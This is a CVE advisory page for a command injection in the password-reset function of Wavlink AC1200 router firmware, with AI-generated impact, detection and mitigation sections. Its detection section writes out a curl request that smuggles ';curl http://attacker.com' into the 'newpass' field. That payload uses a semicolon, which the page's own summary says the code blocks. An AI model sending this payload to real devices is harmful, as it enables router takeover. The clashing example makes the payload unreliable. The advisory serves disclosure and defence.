CVE-2024-48705
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-09-02

Last updated on: 2025-09-04

Assigner: MITRE

Description
Wavlink AC1200 with firmware versions M32A3_V1410_230602 and M32A3_V1410_240222 are vulnerable to a post-authentication command injection while resetting the password. This vulnerability is specifically found within the "set_sys_adm" function of the "adm.cgi" binary, and is due to improper santization of the user provided "newpass" field
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-09-02
Last Modified
2025-09-04
Generated
2026-06-16
AI Q&A
2025-09-02
EPSS Evaluated
2026-06-14
NVD
CVE-2024-48705
EUVD
EUVD-2024-54944
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
wavlink wl-wn531p3_firmware m32a3_v1410_230602
wavlink wl-wn531p3_firmware m32a3_v1410_240222
wavlink wl-wn531p3 *
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2024-48705 is a post-authentication command injection vulnerability in Wavlink AC1200 routers running firmware versions M32A3_V1410_230602 and M32A3_V1410_240222. It exists in the "set_sys_adm" function within the "adm.cgi" binary, specifically in the password reset process. The vulnerability arises because the "newpass" field provided by the user is not properly sanitized before being used in a shell command. Although the code attempts to block semicolons, it fails to prevent other command injection vectors. This allows an authenticated attacker to inject arbitrary shell commands via the "newpass" parameter, which are then executed by the system, potentially compromising the router. [1]

Impact Analysis

This vulnerability can allow an authenticated attacker to execute arbitrary shell commands on the affected Wavlink AC1200 router. This could lead to full compromise of the device, including unauthorized access to sensitive information, modification of router settings, installation of malware, or using the router as a pivot point to attack other devices on the network. Because the attack requires authentication, it is limited to users who can log into the router's web interface, but once exploited, it can severely impact the security and integrity of the network. [1]

Detection Guidance

This vulnerability can be detected by attempting to exploit the command injection in the password reset functionality on the router's web interface. Specifically, sending a crafted POST request to the "/cgi-bin/adm.cgi" endpoint with parameters including "page=sysAdm", "username=admin", "SYSPASS" (current password), and a specially crafted "newpass" parameter containing shell commands can reveal if the system is vulnerable. For example, using curl to send a POST request with a payload in the "newpass" field that attempts to execute a command (such as contacting an attacker-controlled server) can confirm the vulnerability. Example command to test detection: curl -X POST http://<router-ip>/cgi-bin/adm.cgi -d "page=sysAdm&username=admin&SYSPASS=<currentpass>&newpass=validpass;curl http://attacker.com" -d "NEWPASS2=validpass". Successful execution or network activity to the attacker server indicates vulnerability. [1]

Mitigation Strategies

Immediate mitigation steps include restricting access to the router's web interface to trusted users only, disabling remote management if enabled, and avoiding password resets via the vulnerable web interface until a firmware update is available. Since the vulnerability requires authentication, ensure strong current passwords to prevent unauthorized access. Monitoring network traffic for suspicious outbound connections triggered by exploitation attempts can also help detect active attacks. Ultimately, applying a firmware update from the vendor that addresses this command injection vulnerability is necessary once available. [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2024-48705. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart